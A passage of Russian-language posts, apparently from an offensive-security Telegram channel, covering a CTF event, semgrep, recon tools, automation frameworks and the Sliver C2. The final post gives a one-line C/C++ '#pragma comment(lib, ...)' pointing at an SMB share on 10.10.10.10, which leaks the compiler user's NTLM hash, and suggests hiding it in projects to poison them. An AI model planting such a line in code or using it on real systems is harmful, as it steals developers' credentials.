Rust это конечно сильно, но некоторые конструкции порядком забавляют

⚔️ Кибербитва уже на подходе!

На форуме Digital Innopolis Days пройдёт первая кибербитва на иннокиберполигоне университета Иннополис.

👹 Команды хакеров и 🧿 Защитников сразятся за безопасность виртуального города и объектов критической инфраструктуры.

Студенты отработают свои навыки в реалистином окружении и поднимут навыки кибербезопасности на новый уровень.
Кибербитва пройдёт в командах по 5 человек - но для участия выберут лишь 4 команды

Дата события: 19 октября

🔥Стало интересно?
▶️ Подавай заявку на участие по ссылке

#codeanalysis #offensive

При whitebox анализе легко автоматизировать поиск незащищённых endpoint через semgrep - правило пишется минут за 15, зато сразу выведет много полезного.

Вообще, сам по себе семгреп уже достаточно хорош (но далеко не идеален) - но обобщенные правила работают слабовато, для разных проектов приходится их адаптировать

Сразу несколько отборочных за раз :)

Наконец выдалось немного свободного времени. Допилил свой анализатор трафика для #attackdefense

Пока что минимальное рабочее приложение, ещё кучу всего надо докрутить, но уже:
- Есть автосоздание сервисов через сканирование докера
- Следование TCP сессии
- Просмотр пакетов в виде строк/байтов
- Конфиги через toml
- И в добавок все на blazing fast ⏩ memory safe 🔥 языке (#Rust 🦀)

Немного недотянули со всей уцуцугой (на одном из тасков было разрешено брутить ответ организаторами), но результат отличный🏆

#recon

Небольшая подборка инструментов для разведки, которые нечасто упоминают:

Aquatone - классный инструмент для сбора скринов с доменов. Умеет работать с выводом от NMAP, делает скриншоты быстрее чем EyeWitness или gowitness (а ещё проще ставится)
bbot - собирает много разной информации - домены, email, ASN. Чем-то схож с amass, но умеет использовать разные модули - nmap, nuclei. Во время тестов обнаружил далеко не все поддомены, но умеет подсвечивать интересные находки - AXFR, бакеты, ресурсы на гитхабе
aiodnsbrute - мощная и быстрая утилита для перебора поддоменов. Находит интересные поддомены, но нужно использовать хороший вордлист

#recon #automation

Рекон автоматизировать это полезно. Лично я пробовал несколько вариантов:

1. Самописные скрипты - Python/Bash
Плюсы:
+ Быстро писать
+ Легко встраивать новые утилиты (достаточно скопировать команду из терминала)
Минусы:
- Быстро начинаешься путаться
- Сложно отлаживать и могут сломаться
- Сложно делиться и переносить на новые машины

2. Использование специальных Workflow фреймворков (пробовал только Osmedeus)
Плюсы:
+ Легко управлять и модифицировать
+ Есть готовые workflow
+ Умеют параллелить задачи
+ Легко делиться
+ Умеют проверять наличие инструментов и предупреждать заранее об их отсутствии
Минусы:
- Нужно привыкать и изучать язык конфигурации
- Иногда приходится поломать голову чтобы встроить инструмент в workflow
- Ненаглядно, сложно разбираться что куда ходит когда workflow становится большим

3. No-Code или Low-Code платформы (использовал n8n):
Плюсы:
+ Наглядно
+ Легко использовать
+ Есть интеграции с гугл таблицами, chatgpt, встроенный парсинг JSON
+ Более гибкие чем Workflow-платформы
Минусы:
- N8n не поддерживает параллелизм
- Не проверяют наличие утилит
- Не оптимизированы под пентест или багхантинг
- В некоторых случаях сложнее дебажить (если STDERR не подхватился, например)

#automation
Снова про автоматизацию.

Для тех кто хочет посмотреть как может выглядеть n8n для ИБ, есть пример на https://habr.com/ru/companies/lanit/articles/529582/
Даёт примерное представление как это может выглядеть

И немного про Osmedeus - по умолчанию в general workflow включен amass - а он работает довольно долго. В своём workflow я заменил его на bbot

#c2 #offensive #sliver
Всем добрых выходных!

Выкладываю небольшую статью/заметку про sliver - всё же не Кобальтом единым.
Надеюсь будет полезно :)

https://teletype.in/@magnummalum/pArqZhViyXq

#offensive #compilers

Случайно наткнулся на забавное поведение cl.exe - компилятора C/C++ для Windows:
При использовании директивы #pragma можно указать путь до SMB шары, например:

#pragma comment(lib, "\\\\10.10.10.10\\somefile.lib")

int main() {}

Компиляция такой программы приведёт к утечке NTLM хэша

Потенциально, такое может быть использовано чтобы "отравить" какой либо проект, опенсорсный или внутренний - добавив незаметную pragma куда-то глубоко в код.